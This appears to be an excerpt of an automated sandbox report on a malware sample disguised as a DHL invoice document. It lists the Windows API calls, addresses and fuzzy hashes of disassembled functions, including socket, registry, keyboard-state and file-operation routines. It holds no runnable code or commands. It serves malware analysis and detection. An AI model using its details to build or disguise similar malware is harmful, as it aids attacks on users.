                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                        • API String ID: 614568839-2785691316
                                                                                                                        • Opcode ID: cae17fc5eb6ef2b9e0a4356ff3d67c5a3483056aa6bd06b1c8d66199aa5f69d1
                                                                                                                        • Instruction ID: 2d0893a1946bb391a3cc08195c700352a46244aaad5167382d4d9677d11f03d3
                                                                                                                        • Opcode Fuzzy Hash: cae17fc5eb6ef2b9e0a4356ff3d67c5a3483056aa6bd06b1c8d66199aa5f69d1
                                                                                                                        • Instruction Fuzzy Hash: D8910771D0021DAFDF16DFA4D891EEEB7B8BF48314F10816AE915AB251DB709A44CFA0
                                                                                                                        APIs
                                                                                                                        • GetMenu.USER32(?), ref: 003C2183
                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 003C21B5
                                                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003C21DD
                                                                                                                        • _wcslen.LIBCMT ref: 003C2213
                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 003C224D
                                                                                                                        • GetSubMenu.USER32(?,?), ref: 003C225B
                                                                                                                          • Part of subcall function 00393A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00393A57
                                                                                                                          • Part of subcall function 00393A3D: GetCurrentThreadId.KERNEL32 ref: 00393A5E
                                                                                                                          • Part of subcall function 00393A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003925B3), ref: 00393A65
                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003C22E3
                                                                                                                          • Part of subcall function 0039E97B: Sleep.KERNEL32 ref: 0039E9F3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4196846111-0
                                                                                                                        • Opcode ID: a57cb44c9cacc2b2c2f51f044316086f7627a66df3ab44eee861d7359379679c
                                                                                                                        • Instruction ID: fa04670a1da774262168231863629c5162e7224012d9cfa02a18da1e1a34680d
                                                                                                                        • Opcode Fuzzy Hash: a57cb44c9cacc2b2c2f51f044316086f7627a66df3ab44eee861d7359379679c
                                                                                                                        • Instruction Fuzzy Hash: A5716C75A00205AFCB16EF69C885FAEB7F5EF48320F158859E816EB351DB34ED418B90
APIs
• GetParent.USER32(?), ref: 0039AEF9
• GetKeyboardState.USER32(?), ref: 0039AF0E
• SetKeyboardState.USER32(?), ref: 0039AF6F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 0039AF9D
• PostMessageW.USER32(?,00000101,00000011,?), ref: 0039AFBC
• PostMessageW.USER32(?,00000101,00000012,?), ref: 0039AFFD
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 0039B020
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 9cc9a9a53937adcdb695f77ca84fa6863c640e84bd90c31df2d3d25f6981ad11
• Instruction ID: 23c7e8563b71916482b1f8f02d03f38f79f0ae4027870af6171b6ca6929dc1e0
• Opcode Fuzzy Hash: 9cc9a9a53937adcdb695f77ca84fa6863c640e84bd90c31df2d3d25f6981ad11
• Instruction Fuzzy Hash: 5B51E4A0A04BD53DFF3743348D49BBABEE95B06304F098589E1DA858C2C3D8ACD8D791
APIs
• GetParent.USER32(00000000), ref: 0039AD19
• GetKeyboardState.USER32(?), ref: 0039AD2E
• SetKeyboardState.USER32(?), ref: 0039AD8F
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0039ADBB
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0039ADD8
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0039AE17
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0039AE38
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 3337f804bd5b225902d9fe8102b86692726affeb85b994d4818d98aeb82d90a1
• Instruction ID: 61bfbadbc31200cdeb335b970cb3b50f459233702c2f4e4df2bcd7f31c4cdcf4
• Opcode Fuzzy Hash: 3337f804bd5b225902d9fe8102b86692726affeb85b994d4818d98aeb82d90a1
• Instruction Fuzzy Hash: 2451F9A1904BD53DFF3783348C55B7ABED85B46300F098689E1D54A8C2D394EC94E7D2
APIs
• GetConsoleCP.KERNEL32(00373CD6,?,?,?,?,?,?,?,?,00365BA3,?,?,00373CD6,?,?), ref: 00365470
• __fassign.LIBCMT ref: 003654EB
• __fassign.LIBCMT ref: 00365506
• WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00373CD6,00000005,00000000,00000000), ref: 0036552C
• WriteFile.KERNEL32(?,00373CD6,00000000,00365BA3,00000000,?,?,?,?,?,?,?,?,?,00365BA3,?), ref: 0036554B
• WriteFile.KERNEL32(?,?,00000001,00365BA3,00000000,?,?,?,?,?,?,?,?,?,00365BA3,?), ref: 00365584
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 95531349c11d1163ed1ab2471164d71e6a9c6c6be0aea897c096a0b64d7d52d8
• Instruction ID: 57363828ab98470dbcc8f8342fbf873ca7d0acd6a340764332d6825521201b88
• Opcode Fuzzy Hash: 95531349c11d1163ed1ab2471164d71e6a9c6c6be0aea897c096a0b64d7d52d8
• Instruction Fuzzy Hash: CB51D7719006499FDB12CFA8D845AEEBBF9EF0A300F14816EF556E7295D730EA41CB60
APIs
• SetWindowLongW.USER32(00000002,000000F0,?), ref: 003C6C33
• SetWindowLongW.USER32(?,000000EC,?), ref: 003C6C4A
• SendMessageW.USER32(00000002,00001036,00000000,?), ref: 003C6C73
• ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,003AAB79,00000000,00000000), ref: 003C6C98
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 003C6CC7
Strings
Similarity
• API ID: Window$Long$MessageSendShow
• String ID: xV
• API String ID: 3688381893-2513823414
• Opcode ID: 8343328727032a7d39ccb5a91094fa81a56ac4b151bd09c48cc604c88e8e675d
• Instruction ID: c1cf39746cc460a2c5bbc83addf2407af8b1f4a11d8e3a3b00dca74bd7b253bc
• Opcode Fuzzy Hash: 8343328727032a7d39ccb5a91094fa81a56ac4b151bd09c48cc604c88e8e675d
• Instruction Fuzzy Hash: F441D535A04104AFD726CF28CD5AFA97BA9EB09350F16422CF899E72E1C771ED41CB40
APIs
  • Part of subcall function 003B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 003B307A
  • Part of subcall function 003B304E: _wcslen.LIBCMT ref: 003B309B
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003B1112
• WSAGetLastError.WSOCK32 ref: 003B1121
• WSAGetLastError.WSOCK32 ref: 003B11C9
• closesocket.WSOCK32(00000000), ref: 003B11F9
Similarity
• API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
• String ID:
• API String ID: 2675159561-0
• Opcode ID: aea6b0599a42708713a10732d2d0daf7f34a1263ff94914fef52d7a78cbab8a3
• Instruction ID: 421ce458cd622659ae4b9b62277c96a2bf55275bbdc419495e67f1d6d85b1e93
• Opcode Fuzzy Hash: aea6b0599a42708713a10732d2d0daf7f34a1263ff94914fef52d7a78cbab8a3
• Instruction Fuzzy Hash: AD41F431600204AFDB129F18C895BEAB7EDEF45328F148059FA09DF691C770AD41CBA0
APIs
  • Part of subcall function 0039DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0039CF22,?), ref: 0039DDFD
  • Part of subcall function 0039DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0039CF22,?), ref: 0039DE16
• lstrcmpiW.KERNEL32(?,?), ref: 0039CF45
• MoveFileW.KERNEL32(?,?), ref: 0039CF7F
• _wcslen.LIBCMT ref: 0039D005
• _wcslen.LIBCMT ref: 0039D01B
• SHFileOperationW.SHELL32(?), ref: 0039D061
Strings
Similarity
• API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
• String ID: \*.*
• API String ID: 3164238972-1173974218
• Opcode ID: e1865751142f8e0f354077c019864b77f9142ca970fa399a6a9e4401bcd38fda
• Instruction ID: 3e5067dad58adde2d689b9ec07a30cd6c448f047a3372c0ee08ce4558b599913
• Opcode Fuzzy Hash: e1865751142f8e0f354077c019864b77f9142ca970fa399a6a9e4401bcd38fda
• Instruction Fuzzy Hash: 894146719452199FDF13EBA4D982EDDB7B9AF08780F1110E6E509EB141EB34AA88CB50
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00397769
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0039778F
• SysAllocString.OLEAUT32(00000000), ref: 00397792
• SysAllocString.OLEAUT32(?), ref: 003977B0
• SysFreeString.OLEAUT32(?), ref: 003977B9
• StringFromGUID2.OLE32(?,?,00000028), ref: 003977DE
• SysAllocString.OLEAUT32(?), ref: 003977EC
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3761583154-0
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00397842
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00397868
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0039786B
                                                                                                                        • SysAllocString.OLEAUT32 ref: 0039788C
                                                                                                                        • SysFreeString.OLEAUT32 ref: 00397895
                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 003978AF
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 003978BD
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3761583154-0
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 003A04F2
                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003A052E
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHandlePipe
                                                                                                                        • String ID: nul
                                                                                                                        • API String ID: 1424370930-2873401336
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 003A05C6
                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003A0601
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHandlePipe
                                                                                                                        • String ID: nul
                                                                                                                        • API String ID: 1424370930-2873401336
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0033600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0033604C
                                                                                                                          • Part of subcall function 0033600E: GetStockObject.GDI32(00000011), ref: 00336060
                                                                                                                          • Part of subcall function 0033600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0033606A
                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003C4112
                                                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003C411F
                                                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003C412A
                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003C4139
                                                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003C4145
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                        • String ID: Msctls_Progress32
                                                                                                                        • API String ID: 1025951953-3636473452
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0036D7A3: _free.LIBCMT ref: 0036D7CC
                                                                                                                        • _free.LIBCMT ref: 0036D82D
                                                                                                                          • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
                                                                                                                          • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
                                                                                                                        • _free.LIBCMT ref: 0036D838
                                                                                                                        • _free.LIBCMT ref: 0036D843
                                                                                                                        • _free.LIBCMT ref: 0036D897
                                                                                                                        • _free.LIBCMT ref: 0036D8A2
                                                                                                                        • _free.LIBCMT ref: 0036D8AD
                                                                                                                        • _free.LIBCMT ref: 0036D8B8
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0039DA74
                                                                                                                        • LoadStringW.USER32(00000000), ref: 0039DA7B
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0039DA91
                                                                                                                        • LoadStringW.USER32(00000000), ref: 0039DA98
                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0039DADC
                                                                                                                        Strings
                                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 0039DAB9
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleLoadModuleString$Message
                                                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                        • API String ID: 4072794657-3128320259
                                                                                                                        APIs
                                                                                                                        • InterlockedExchange.KERNEL32(00E7E318,00E7E318), ref: 003A097B
                                                                                                                        • EnterCriticalSection.KERNEL32(00E7E2F8,00000000), ref: 003A098D
                                                                                                                        • TerminateThread.KERNEL32(00E7E310,000001F6), ref: 003A099B
                                                                                                                        • WaitForSingleObject.KERNEL32(00E7E310,000003E8), ref: 003A09A9
                                                                                                                        • CloseHandle.KERNEL32(00E7E310), ref: 003A09B8
                                                                                                                        • InterlockedExchange.KERNEL32(00E7E318,000001F6), ref: 003A09C8
                                                                                                                        • LeaveCriticalSection.KERNEL32(00E7E2F8), ref: 003A09CF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3495660284-0
                                                                                                                        • Opcode ID: 6a7db9aaec4c1f98b14ec9bcf86b757a681260d55fb0a13174300eb4b2c360e4
                                                                                                                        • Instruction ID: 4610fb0a3245222a2599ec800cd1d3fa9c1207b3c6b5d5b04b4b2d44b9a5f2fa
                                                                                                                        • Opcode Fuzzy Hash: 6a7db9aaec4c1f98b14ec9bcf86b757a681260d55fb0a13174300eb4b2c360e4
                                                                                                                        • Instruction Fuzzy Hash: D8F01932452A02ABDB465BA4EE8CED6BA39FF02702F402525F206908A0C774A465CF90
                                                                                                                        APIs
                                                                                                                        • __allrem.LIBCMT ref: 003600BA
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003600D6
                                                                                                                        • __allrem.LIBCMT ref: 003600ED
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0036010B
                                                                                                                        • __allrem.LIBCMT ref: 00360122
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00360140
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1992179935-0
                                                                                                                        • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                                        • Instruction ID: 65b1f48eb61d0aa5cd6c7c63b1f7658b71cfacf1c74ba5b0465c3ef8e8350ceb
                                                                                                                        • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                                        • Instruction Fuzzy Hash: 7B8149766007069FE7269F38CC42B6BB3E8AF41720F25863AF851DB691E770D9048B50
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,003582D9,003582D9,?,?,?,0036644F,00000001,00000001,8BE85006), ref: 00366258
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0036644F,00000001,00000001,8BE85006,?,?,?), ref: 003662DE
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 003663D8
                                                                                                                        • __freea.LIBCMT ref: 003663E5
                                                                                                                          • Part of subcall function 00363820: RtlAllocateHeap.NTDLL(00000000,?,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6,?,00331129), ref: 00363852
                                                                                                                        • __freea.LIBCMT ref: 003663EE
                                                                                                                        • __freea.LIBCMT ref: 00366413
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1414292761-0
                                                                                                                        • Opcode ID: 8214d981a21ae79543a3d2a7aafdd29badca6bacc941bde5e856a909270c780e
                                                                                                                        • Instruction ID: ef221e313deaedfb21550f715ef4422660298a2be68c2c68106f0310d9e558e6
                                                                                                                        • Opcode Fuzzy Hash: 8214d981a21ae79543a3d2a7aafdd29badca6bacc941bde5e856a909270c780e
                                                                                                                        • Instruction Fuzzy Hash: 0C51D672600216ABDB278F64CC82EBF77A9EF45790F268629FD05DB258DB34DC40C660
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                          • Part of subcall function 003BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BB6AE,?,?), ref: 003BC9B5
                                                                                                                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BC9F1
                                                                                                                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA68
                                                                                                                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA9E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003BBCCA
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003BBD25
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 003BBD6A
                                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003BBD99
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003BBDF3
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 003BBDFF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1120388591-0
                                                                                                                        • Opcode ID: 11c262b087d7e949197edee6ce6ca2c70d96c6c2a3c0129de93d3f2c02d2df4d
                                                                                                                        • Instruction ID: fc6f79350383439aa489b4f4e19fb7d627ee3255add851424da7f128fdbba154
                                                                                                                        • Opcode Fuzzy Hash: 11c262b087d7e949197edee6ce6ca2c70d96c6c2a3c0129de93d3f2c02d2df4d
                                                                                                                        • Instruction Fuzzy Hash: 63818C30208241AFD716DF24C891E6ABBE9FF84308F14855CF5998B6A2DF71ED45CB92
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(00000035), ref: 0038F7B9
                                                                                                                        • SysAllocString.OLEAUT32(00000001), ref: 0038F860
                                                                                                                        • VariantCopy.OLEAUT32(0038FA64,00000000), ref: 0038F889
                                                                                                                        • VariantClear.OLEAUT32(0038FA64), ref: 0038F8AD
                                                                                                                        • VariantCopy.OLEAUT32(0038FA64,00000000), ref: 0038F8B1
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0038F8BB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3859894641-0
                                                                                                                        • Opcode ID: f43910585786473551dc6adec5591c58ebc60f3f277d79801652f73af845b372
                                                                                                                        • Instruction ID: 73afe11c9b6a47092692a5bfac929a34a898c551e4e4215781a63787432aa4e5
                                                                                                                        • Opcode Fuzzy Hash: f43910585786473551dc6adec5591c58ebc60f3f277d79801652f73af845b372
                                                                                                                        • Instruction Fuzzy Hash: 6E51D331610310FFCF26BB65D895B29B3A8EF45310F2494A7E906DF296DB709C40CBA6
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00337620: _wcslen.LIBCMT ref: 00337625
                                                                                                                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                                                                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 003A94E5
                                                                                                                        • _wcslen.LIBCMT ref: 003A9506
                                                                                                                        • _wcslen.LIBCMT ref: 003A952D
                                                                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 003A9585
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$FileName$OpenSave
                                                                                                                        • String ID: X
                                                                                                                        • API String ID: 83654149-3081909835
                                                                                                                        • Opcode ID: 6529b127c03892734193cd57d87794a8b8bd28e0e806511d1119ee4eae6e9fd7
                                                                                                                        • Instruction ID: a41c7d0552c40e9eeedcf4f0e8b70e1f8fc78be0f4fa18fdc296bae8c427ab73
                                                                                                                        • Opcode Fuzzy Hash: 6529b127c03892734193cd57d87794a8b8bd28e0e806511d1119ee4eae6e9fd7
                                                                                                                        • Instruction Fuzzy Hash: 21E181355083409FD726DF24C485B6AB7E4FF86314F05896EF8899B2A2DB31DD05CB92
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                                                                                                                        • BeginPaint.USER32(?,?,?), ref: 00349241
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 003492A5
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 003492C2
                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003492D3
                                                                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00349321
                                                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 003871EA
                                                                                                                          • Part of subcall function 00349339: BeginPath.GDI32(00000000), ref: 00349357
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
